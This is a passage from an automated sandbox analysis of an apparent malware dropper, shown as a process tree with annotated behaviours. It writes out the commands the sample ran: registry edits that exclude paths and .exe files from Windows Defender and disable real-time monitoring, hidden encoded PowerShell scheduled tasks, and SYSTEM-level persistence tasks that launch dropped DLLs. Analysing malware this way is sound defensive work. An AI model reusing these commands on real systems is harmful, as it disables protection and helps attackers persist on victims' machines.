memory of 1320 1120 forfiles.exe 34 PID 1120 wrote to memory of 1320 1120 forfiles.exe 34 PID 1120 wrote to memory of 1320 1120 forfiles.exe 34 PID 1888 wrote to memory of 1144 1888 forfiles.exe 35 PID 1888 wrote to memory of 1144 1888 forfiles.exe 35 PID 1888 wrote to memory of 1144 1888 forfiles.exe 35 PID 1888 wrote to memory of 1144 1888 forfiles.exe 35 PID 1888 wrote to memory of 1144 1888 forfiles.exe 35 PID 1888 wrote to memory of 1144 1888 forfiles.exe 35 PID 1888 wrote to memory of 1144 1888 forfiles.exe 35 PID 1144 wrote to memory of 1292 1144 cmd.exe 36 PID 1144 wrote to memory of 1292 1144 cmd.exe 36 PID 1144 wrote to memory of 1292 1144 cmd.exe 36 PID 1144 wrote to memory of 1292 1144 cmd.exe 36 PID 1144 wrote to memory of 1292 1144 cmd.exe 36 PID 1144 wrote to memory of 1292 1144 cmd.exe 36 PID 1144 wrote to memory of 1292 1144 cmd.exe 36 PID 1320 wrote to memory of 820 1320 cmd.exe 37 PID 1320 wrote to memory of 820 1320 cmd.exe 37 PID 1320 wrote to memory of 820 1320 cmd.exe 37 PID 1320 wrote to memory of 820 1320 cmd.exe 37 PID 1320 wrote to memory of 820 1320 cmd.exe 37 PID 1320 wrote to memory of 820 1320 cmd.exe 37 PID 1320 wrote to memory of 820 1320 cmd.exe 37 PID 1144 wrote to memory of 1260 1144 cmd.exe 38 PID 1144 wrote to memory of 1260 1144 cmd.exe 38 PID 1144 wrote to memory of 1260 1144 cmd.exe 38 PID 1144 wrote to memory of 1260 1144 cmd.exe 38 PID 1144 wrote to memory of 1260 1144 cmd.exe 38 PID 1144 wrote to memory of 1260 1144 cmd.exe 38 PID 1144 wrote to memory of 1260 1144 cmd.exe 38 PID 1320 wrote to memory of 1268 1320 cmd.exe 39
Processes
-
C:\Users\Admin\AppData\Local\Temp\984f3960c7a02abafb1bb502406a2e053bba3d5ec1ad1a432e1dbd728a36efcc.exe"C:\Users\Admin\AppData\Local\Temp\984f3960c7a02abafb1bb502406a2e053bba3d5ec1ad1a432e1dbd728a36efcc.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:620 -
C:\Users\Admin\AppData\Local\Temp\7zS484.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:856 -
C:\Users\Admin\AppData\Local\Temp\7zS12A7.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:388 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1120 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1320 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:820
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:1268
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1888 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1144 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1292
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1260
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gFZstGNQr" /SC once /ST 00:16:31 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:2004
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gFZstGNQr"4⤵PID:1936
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gFZstGNQr"4⤵PID:1908
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvaTKsBBalfzetbIqS" /SC once /ST 11:37:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\nSsQRaKrrRPLzDjLR\XVNxJANhOcIWPTn\JrcEnZk.exe\" zx /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1536
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {2902B2AB-EF1D-45E9-810C-D00030EE8B9D} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]1⤵PID:1968
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:984 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:948
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:396 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1160
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1584 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:860
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1584 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:828
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1600
-
C:\Windows\system32\taskeng.exetaskeng.exe {3D84D5C9-1C73-4930-B673-7612025853CD} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1280
-
C:\Users\Admin\AppData\Local\Temp\nSsQRaKrrRPLzDjLR\XVNxJANhOcIWPTn\JrcEnZk.exeC:\Users\Admin\AppData\Local\Temp\nSsQRaKrrRPLzDjLR\XVNxJANhOcIWPTn\JrcEnZk.exe zx /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:820 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gHrpVmELZ" /SC once /ST 02:39:57 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1268
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gHrpVmELZ"3⤵PID:1032
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gHrpVmELZ"3⤵PID:1988
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:1564
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:2040
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:660
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1352
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gKliZWZZN" /SC once /ST 09:13:01 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1536
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gKliZWZZN"3⤵PID:1540
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gKliZWZZN"3⤵PID:1708
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nCvDbzSfnWcpLPar" /t REG_DWORD /d 0 /reg:323⤵PID:1980
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nCvDbzSfnWcpLPar" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1412
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nCvDbzSfnWcpLPar" /t REG_DWORD /d 0 /reg:643⤵PID:952
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nCvDbzSfnWcpLPar" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2000
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nCvDbzSfnWcpLPar" /t REG_DWORD /d 0 /reg:323⤵PID:1688
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nCvDbzSfnWcpLPar" /t REG_DWORD /d 0 /reg:324⤵PID:988
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nCvDbzSfnWcpLPar" /t REG_DWORD /d 0 /reg:643⤵PID:552
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nCvDbzSfnWcpLPar" /t REG_DWORD /d 0 /reg:644⤵PID:1856
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\nCvDbzSfnWcpLPar\eiCULhuE\tcupFyyGivpifMbW.wsf"3⤵PID:1332
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\nCvDbzSfnWcpLPar\eiCULhuE\tcupFyyGivpifMbW.wsf"3⤵
- Modifies data under HKEY_USERS
PID:1732 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CmszfUlKU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1540
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CmszfUlKU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:360
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KAzPppVjngGU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1268
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KAzPppVjngGU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1032
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LwwnfqzUtnUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:984
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LwwnfqzUtnUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1712
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NBAnxdAYyVuYrJIDKcR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1588
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NBAnxdAYyVuYrJIDKcR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2028
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tEUgboViOVXhC" /t REG_DWORD /d 0 /reg:324⤵PID:1700
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tEUgboViOVXhC" /t REG_DWORD /d 0 /reg:644⤵PID:904
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\iYAYiDbRBZchqqVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1056
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\iYAYiDbRBZchqqVB" /t REG_DWORD /d 0 /reg:644⤵PID:588
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\nSsQRaKrrRPLzDjLR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:320
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\nSsQRaKrrRPLzDjLR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1908
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nCvDbzSfnWcpLPar" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1704
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nCvDbzSfnWcpLPar" /t REG_DWORD /d 0 /reg:644⤵PID:524
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CmszfUlKU" /t REG_DWORD /d 0 /reg:324⤵PID:1624
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CmszfUlKU" /t REG_DWORD /d 0 /reg:644⤵PID:1584
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KAzPppVjngGU2" /t REG_DWORD /d 0 /reg:324⤵PID:800
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KAzPppVjngGU2" /t REG_DWORD /d 0 /reg:644⤵PID:1468
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LwwnfqzUtnUn" /t REG_DWORD /d 0 /reg:324⤵PID:1844
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LwwnfqzUtnUn" /t REG_DWORD /d 0 /reg:644⤵PID:2004
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NBAnxdAYyVuYrJIDKcR" /t REG_DWORD /d 0 /reg:324⤵PID:1152
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NBAnxdAYyVuYrJIDKcR" /t REG_DWORD /d 0 /reg:644⤵PID:1708
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tEUgboViOVXhC" /t REG_DWORD /d 0 /reg:324⤵PID:2000
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tEUgboViOVXhC" /t REG_DWORD /d 0 /reg:644⤵PID:1980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\iYAYiDbRBZchqqVB" /t REG_DWORD /d 0 /reg:324⤵PID:1564
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\iYAYiDbRBZchqqVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:588
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\nSsQRaKrrRPLzDjLR" /t REG_DWORD /d 0 /reg:324⤵PID:1332
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\nSsQRaKrrRPLzDjLR" /t REG_DWORD /d 0 /reg:644⤵PID:1260
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nCvDbzSfnWcpLPar" /t REG_DWORD /d 0 /reg:324⤵PID:1780
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nCvDbzSfnWcpLPar" /t REG_DWORD /d 0 /reg:644⤵PID:1976
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ghAtFGVqo" /SC once /ST 04:04:08 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Windows security bypass
- Creates scheduled task(s)
PID:524
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ghAtFGVqo"3⤵PID:1120
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ghAtFGVqo"3⤵PID:1708
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:952
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:904
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:2040
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:1684
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "pWRoRRufbcBSXnZTh" /SC once /ST 04:09:42 /RU "SYSTEM" /TR "\"C:\Windows\Temp\nCvDbzSfnWcpLPar\lkLPmIMLbHWoFWQ\vpNprnR.exe\" x3 /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1036
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "pWRoRRufbcBSXnZTh"3⤵PID:1768
-
-
-
C:\Windows\Temp\nCvDbzSfnWcpLPar\lkLPmIMLbHWoFWQ\vpNprnR.exeC:\Windows\Temp\nCvDbzSfnWcpLPar\lkLPmIMLbHWoFWQ\vpNprnR.exe x3 /site_id 525403 /S2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:1908 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bvaTKsBBalfzetbIqS"3⤵PID:1288
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:1780
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:1260
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:1320
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:1940
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\CmszfUlKU\wDfClg.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "KkeCdiUIdtvoEjB" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1228
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KkeCdiUIdtvoEjB2" /F /xml "C:\Program Files (x86)\CmszfUlKU\qSPyLqj.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:292
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "KkeCdiUIdtvoEjB"3⤵PID:1412
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "KkeCdiUIdtvoEjB"3⤵PID:2028
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BYfreUTgaQAVQR" /F /xml "C:\Program Files (x86)\KAzPppVjngGU2\TlkJuQP.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:852
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "INRgpfBnMiucI2" /F /xml "C:\ProgramData\iYAYiDbRBZchqqVB\jvksANj.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1988
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jhnbRtIPHnWCQmBRX2" /F /xml "C:\Program Files (x86)\NBAnxdAYyVuYrJIDKcR\OOpFgow.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:320
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ghuRIaaXKwKUHLxhrFG2" /F /xml "C:\Program Files (x86)\tEUgboViOVXhC\BeaqFzK.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1736
-
-
